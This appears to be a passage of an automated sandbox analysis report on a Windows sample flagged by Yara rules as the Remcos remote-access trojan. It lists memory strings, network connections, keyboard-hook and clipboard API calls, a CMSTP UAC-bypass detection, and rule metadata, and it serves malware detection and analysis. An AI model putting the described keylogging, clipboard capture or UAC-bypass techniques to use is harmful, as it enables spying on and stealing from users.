                Source: 4XYAW8PbZH.exe, 00000000.00000002.1831640723.0000000002911000.00000004.00000800.00020000.00000000.sdmp, graias.exe, 00000008.00000002.1856673299.0000000002F0F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1839750888.0000000006E12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://aka.ms/certhelp
                Source: chromecache_283.17.drString found in binary or memory: https://aka.ms/feedback/report?space=61
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://aka.ms/msignite_docs_banner
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://aka.ms/pshelpmechoose
                Source: chromecache_283.17.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
                Source: chromecache_283.17.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
                Source: chromecache_283.17.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://channel9.msdn.com/
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/Thraka
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/Youssef1313
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/adegeo
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://github.com/dotnet/try
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/gewarren
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://github.com/js-cookie/js-cookie
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/mairaw
                Source: chromecache_283.17.drString found in binary or memory: https://github.com/nschonni
                Source: chromecache_283.17.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
                Source: chromecache_296.17.drString found in binary or memory: https://schema.org
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
                Source: chromecache_296.17.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
                Source: chromecache_316.17.dr, chromecache_296.17.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50658
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                Source: unknownNetwork traffic detected: HTTP traffic on port 50781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50477
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50796
                Source: unknownNetwork traffic detected: HTTP traffic on port 50798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50584 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50477 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50605 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50623
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                Source: unknownNetwork traffic detected: HTTP traffic on port 50658 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50605
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50584
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50781
                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50740
                Source: unknownNetwork traffic detected: HTTP traffic on port 50623 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000003_2_004099E4
                Installs a global keyboard hook
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Graias\graias.exe
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004159C6
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004159C6
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004159C6
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,3_2_00409B10
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\graias\logs.dat, type: DROPPED

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Contains functionalty to change the wallpaper
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041BB81 SystemParametersInfoW,3_2_0041BB81
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041BB87 SystemParametersInfoW,3_2_0041BB87
                Source: chrome.exeProcess created: 99

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,3_2_004158B9
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_00DFE5A40_2_00DFE5A4
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F140D00_2_04F140D0
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F16EFE0_2_04F16EFE
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F198CC0_2_04F198CC
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F129180_2_04F12918
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F123680_2_04F12368
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F123570_2_04F12357
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F198C40_2_04F198C4
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F17A300_2_04F17A30
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_04F1ABF20_2_04F1ABF2
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_054DE6C00_2_054DE6C0
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_054D30D80_2_054D30D8
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_054DE2880_2_054DE288
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_054DDE500_2_054DDE50
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_054DF9600_2_054DF960
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 0_2_054DDA180_2_054DDA18
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004520E23_2_004520E2
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041D0813_2_0041D081
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0043D0A83_2_0043D0A8
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004371603_2_00437160
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004361BA3_2_004361BA
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004262643_2_00426264
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004313873_2_00431387
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0043652C3_2_0043652C
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041E5EF3_2_0041E5EF
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0044C7493_2_0044C749
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004367D63_2_004367D6
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_004267DB3_2_004267DB
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0043C9ED3_2_0043C9ED
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00432A593_2_00432A59
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00436A9D3_2_00436A9D
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0043CC1C3_2_0043CC1C
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00436D583_2_00436D58
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00434D323_2_00434D32
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0043CE4B3_2_0043CE4B
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00440E303_2_00440E30
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00426E833_2_00426E83
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00412F453_2_00412F45
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00452F103_2_00452F10
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00426FBD3_2_00426FBD
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_013BE5A48_2_013BE5A4
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: String function: 00401F66 appears 50 times
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: String function: 004020E7 appears 39 times
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: String function: 004338B5 appears 41 times
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: String function: 00433FC0 appears 55 times
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 1372
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1831640723.0000000002A92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1830117697.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1838155676.0000000005230000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1831640723.00000000029C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1841857834.00000000073D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exe, 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exe, 00000000.00000000.1645997748.00000000005B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametYfl.exe8 vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exe, 00000003.00000002.1676941633.000000000111F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameLMEMH vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exeBinary or memory string: OriginalFilenametYfl.exe8 vs 4XYAW8PbZH.exe
                Source: 4XYAW8PbZH.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
